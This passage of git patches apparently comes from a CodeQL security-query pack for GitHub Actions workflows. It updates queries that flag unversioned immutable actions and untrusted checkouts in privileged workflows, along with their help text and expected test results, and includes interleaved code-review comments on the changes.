.github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | 
actions/checkout | -| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | -| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | -| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | -| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | -| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | -| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | 
.github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | -| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | -| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | -| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | -| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | -| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is 
using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | +| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:43:9:47:2 | 
Uses Step | actions/upload-pages-artifact | +| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | 
.github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | From df0c1e28e713c83b2a29f97bc6aaa6fa199c1c0e Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:49:43 -0400 Subject: [PATCH 0627/1267] stub out qlhelp --- .../Security/CWE-829/UnversionedImmutableAction.md | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md index eab708f8602..754fe75b62b 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.md +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md 
@@ -1,27 +1,29 @@ -# Unpinned tag for 3rd party Action in workflow +# Unversioned Immutable Action ## Description -Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. +Using an immutable action without indicating proper semantic version will result in the version being resolved to a tag that is mutable. This means the action code can between runs and without the user's knowledge. Using an immutable action with proper semantic versioning will resolve to the exact version +of the action stored in the GitHub package registry. The action code will not change between runs. ## Recommendations -Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. +When using [immutable actions]() use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. ## Examples ### Incorrect Usage ```yaml -- uses: tj-actions/changed-files@v44 +- uses: actions/checkout@some-tag +- uses: actions/checkout@2.x.x ``` ### Correct Usage ```yaml -- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +- uses: actions/checkout@4.0.0 ``` ## References -- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) +- [Consuming immutable actions]() From f7162228012cb27341f759c9d05fdeb3c554bba0 Mon Sep 17 00:00:00 2001 
From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:27:53 -0400 Subject: [PATCH 0628/1267] remove octokit from trusted orgs for now - reduce PR scope --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 2111cc118a9..10c21bc368b 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) + exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From 030c08e5aee4f5138dc8b9bd670fe3afd7fb1019 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:54:27 -0400 Subject: [PATCH 0629/1267] update expected from example originating from main branch merge --- .../Security/CWE-829/UnversionedImmutableAction.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index df23709b542..6d30e6f4cbe 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected 
@@ -20,3 +20,4 @@ | .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | | .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | | .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test22.yml:57:15:62:12 | Uses Step | actions/checkout | From 40ec9d623d71afedc0cd0bdd64be30d987790bfe Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:55:44 -0400 Subject: [PATCH 0630/1267] update existing tests to accomdate for trips from octokit2 example added to support unversioned immutable action ql --- .../Security/CWE-829/UnpinnedActionsTag.expected | 3 +++ .../Security/CWE-829/UntrustedCheckoutCritical.expected | 6 ++++++ .../Security/CWE-829/UntrustedCheckoutHigh.expected | 1 + 3 files changed, 10 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 0457fd7afaa..aa19c08f2f0 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -10,6 +10,9 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit2.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit2.yml:20:15:20:43 | octokit/request-action@v2.x.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit2.yml:34:15:34:42 | some-action/some-repo@latest | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'some-action/some-repo' with ref 'latest', not a pinned commit 
hash | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | Uses Step | | .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b2e5eb9de8..d36340d6bcc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -93,6 +93,12 @@ edges | .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | | .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit2.yml:26:9:27:6 | name: C ... ildcard | +| .github/workflows/issue_comment_octokit2.yml:26:9:27:6 | name: C ... ildcard | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:37:9:38:37 | Uses Step | | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 1d6122b3747..8e3ecaee547 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -5,6 +5,7 @@ | .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 6802cd2398adf5f5b90b889c5575ff60d2237eda Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:25:18 +0200 Subject: [PATCH 0631/1267] Improve checkout trigger events checks --- .../security/UntrustedCheckoutQuery.qll | 56 ++++++++----------- .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../Security/CWE-829/UntrustedCheckoutHigh.ql | 1 + 3 files changed, 25 insertions(+), 33 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 01da214b6ea..ffbb6fac263 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,7 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and + //source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource 
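Review bot: The trigger condition in `isSource` is disabled by commenting it out (`//source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and`) rather than removed, and the same pattern repeats in the hunks at -209, -247, -273, -297, -318 and -341. A dead conjunct in a security library reads as if the filter might still be intended at this level. Either delete the lines or replace each with a one-line explanation such as `// trigger filtering is applied by the queries via event.getName() = checkoutTriggers()`. The predicate and class bodies continue outside these hunks.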
@@ -209,29 +209,24 @@ abstract class SHACheckoutStep extends PRHeadCheckoutStep { } class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and + //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists( ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink | ActionsMutableRefCheckoutFlow::flowPath(source, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() ) or // heuristic base on the step id and field name - exists(string value | - this.getArgumentExpr("ref") - .(SimpleReferenceExpression) - .getEnclosingJob() - .getATriggerEvent() - .getName() = checkoutTriggers() and - value.regexpMatch(".*(head|branch|ref).*") + exists(string value, Expression expr | + value.regexpMatch(".*(head|branch|ref).*") and expr = this.getArgumentExpr("ref") | - this.getArgumentExpr("ref").(StepsExpression).getStepId() = value or - this.getArgumentExpr("ref").(StepsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(NeedsExpression).getNeededJobId() = value or - this.getArgumentExpr("ref").(NeedsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getAccessPath() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getInnerExpression() = value + expr.(StepsExpression).getStepId() = value or + expr.(SimpleReferenceExpression).getFieldName() = value or + expr.(NeedsExpression).getNeededJobId() = value or + expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(JsonReferenceExpression).getInnerExpression() = value ) ) } 
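Review bot: The comment `// heuristic base on the step id and field name` no longer describes the disjunction under it: the rewritten `exists` also compares `value` with the needed job id and with the JSON access path and inner expression, and the same stale comment sits in the -247 hunk for `ActionsSHACheckout`. Suggested wording: `// heuristic based on the step id, needed job id, field name or JSON access path of the ref argument`. It would also help to state there that `.*(head|branch|ref).*` is an unanchored substring match, so an id such as `prefix` satisfies it. With the trigger conjunct gone from this class, that breadth applies to every workflow unless the consuming query filters by event.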
@@ -247,27 +242,22 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and + //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(source, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() ) or // heuristic base on the step id and field name - exists(string value | - this.getArgumentExpr("ref") - .(SimpleReferenceExpression) - .getEnclosingJob() - .getATriggerEvent() - .getName() = checkoutTriggers() and - value.regexpMatch(".*(head|sha|commit).*") + exists(string value, Expression expr | + value.regexpMatch(".*(head|sha|commit).*") and expr = this.getArgumentExpr("ref") | - this.getArgumentExpr("ref").(StepsExpression).getStepId() = value or - this.getArgumentExpr("ref").(StepsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(NeedsExpression).getNeededJobId() = value or - this.getArgumentExpr("ref").(NeedsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getAccessPath() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getInnerExpression() = value + expr.(StepsExpression).getStepId() = value or + expr.(SimpleReferenceExpression).getFieldName() = value or + expr.(NeedsExpression).getNeededJobId() = value or + expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(JsonReferenceExpression).getInnerExpression() = value ) ) } 
@@ -283,7 +273,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -307,7 +297,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -328,7 +318,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -351,7 +341,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index be3b02ae477..07602af0ac4 100644 
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -48,6 +48,7 @@ where // the checkout occurs in a privileged context inPrivilegedContext(poisonable, event) and inPrivilegedContext(checkout, event) and + event.getName() = checkoutTriggers() and not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) select poisonable, checkout, poisonable, diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index e130ba5dbb8..39cd1860097 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -24,6 +24,7 @@ where not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and + event.getName() = checkoutTriggers() and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and From d8f79818d6ffd1f572bf1a88bad78124785acd3d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:25:47 +0200 Subject: [PATCH 0632/1267] Improve extraction of Output/Env assignments --- ql/lib/codeql/actions/Bash.qll | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index c1e038069eb..fda27732828 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll 
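Review bot: `event.getName() = checkoutTriggers()` is re-added only in `UntrustedCheckoutCritical.ql` and in `UntrustedCheckoutHigh.ql` (the -24 hunk), while the library change in this commit removes the trigger condition from all six checkout classes and from `isSource`. Any other consumer of those classes now sees checkouts under every trigger. The next commit in the series adds rows to `UntrustedCheckoutMedium.expected`, which suggests at least that query widened. If this is intended, record it where the classes are defined, for example `// checkout classes are trigger-agnostic; each query must restrict event.getName() itself`. If it is not, the same conjunct is needed in the remaining queries. Both `where` clauses start outside the hunks.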
@@ -256,20 +256,20 @@ class BashShellScript extends ShellScript { override predicate getAWriteToGitHubEnv(string name, string data) { exists(string raw | - Bash::extractFileWrite(this.getRawScript(), "GITHUB_ENV", raw) and + Bash::extractFileWrite(this, "GITHUB_ENV", raw) and Bash::extractVariableAndValue(raw, name, data) ) } override predicate getAWriteToGitHubOutput(string name, string data) { exists(string raw | - Bash::extractFileWrite(this.getRawScript(), "GITHUB_OUTPUT", raw) and + Bash::extractFileWrite(this, "GITHUB_OUTPUT", raw) and Bash::extractVariableAndValue(raw, name, data) ) } override predicate getAWriteToGitHubPath(string data) { - Bash::extractFileWrite(this.getRawScript(), "GITHUB_PATH", data) + Bash::extractFileWrite(this, "GITHUB_PATH", data) } override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { @@ -542,12 +542,12 @@ module Bash { blockFileWrite(script, cmd, file, content, filters) } - bindingset[script, file_var] - predicate extractFileWrite(string script, string file_var, string content) { + bindingset[file_var] + predicate extractFileWrite(BashShellScript script, string file_var, string content) { // single line assignment exists(string file_expr, string raw_content | isParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + singleLineFileWrite(script.getAStmt(), _, file_expr, raw_content, _) and content = trimQuotes(raw_content) ) or @@ -566,12 +566,12 @@ module Bash { cmd = "add-path" and content = value ) and - singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + singleLineWorkflowCmd(script.getAStmt(), cmd, key, value) ) or // multiline assignment exists(string file_expr, string raw_content | - multiLineFileWrite(script, 